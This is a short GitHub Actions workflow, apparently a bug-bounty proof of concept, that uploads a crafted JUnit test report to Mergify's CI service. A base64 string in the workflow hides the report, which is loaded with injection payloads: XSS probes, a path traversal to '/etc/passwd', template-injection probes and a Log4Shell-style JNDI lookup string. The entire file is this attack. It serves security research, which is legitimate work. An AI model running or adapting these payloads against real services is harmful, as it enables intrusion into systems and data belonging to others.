name: ci-inject
on: push
permissions:
  id-token: write
  contents: read
jobs:
  inject:
    runs-on: ubuntu-latest
    steps:
      - run: echo PHRlc3RzdWl0ZXM+PHRlc3RzdWl0ZSBuYW1lPSJwbF8mbHQ7aW1nIHNyYz14IG9uZXJyb3I9YWxlcnQoMSkmZ3Q7IiB0ZXN0cz0iMSIgZmFpbHVyZXM9IjEiPjx0ZXN0Y2FzZSBuYW1lPSJ0XyZsdDtzdmcvb25sb2FkPWFsZXJ0KGRvY3VtZW50LmRvbWFpbikmZ3Q7IiBjbGFzc25hbWU9ImNfJmx0O3NjcmlwdCZndDt4Jmx0Oy9zY3JpcHQmZ3Q7IiBmaWxlPSIuLi8uLi8uLi9ldGMvcGFzc3dkIj48ZmFpbHVyZSBtZXNzYWdlPSJNU0cgJmx0O3NjcmlwdCZndDthbGVydCgyKSZsdDsvc2NyaXB0Jmd0OyB7ezcqN319ICR7am5kaTpsZGFwOi8veH0iIHR5cGU9IkUiPlNUQUNLICZsdDtzdmcgb25sb2FkPWFsZXJ0KDMpJmd0OyB7e2NvbmZpZ319PC9mYWlsdXJlPjwvdGVzdGNhc2U+PC90ZXN0c3VpdGU+PC90ZXN0c3VpdGVzPg== | base64 -d > j.xml
      - run: pip install mergify-cli
      - run: mergify ci junit-process --repository researcher-intigriti/test-repo-poc --tests-target-branch main j.xml || true
        env:
          GITHUB_TOKEN: ${{ github.token }}
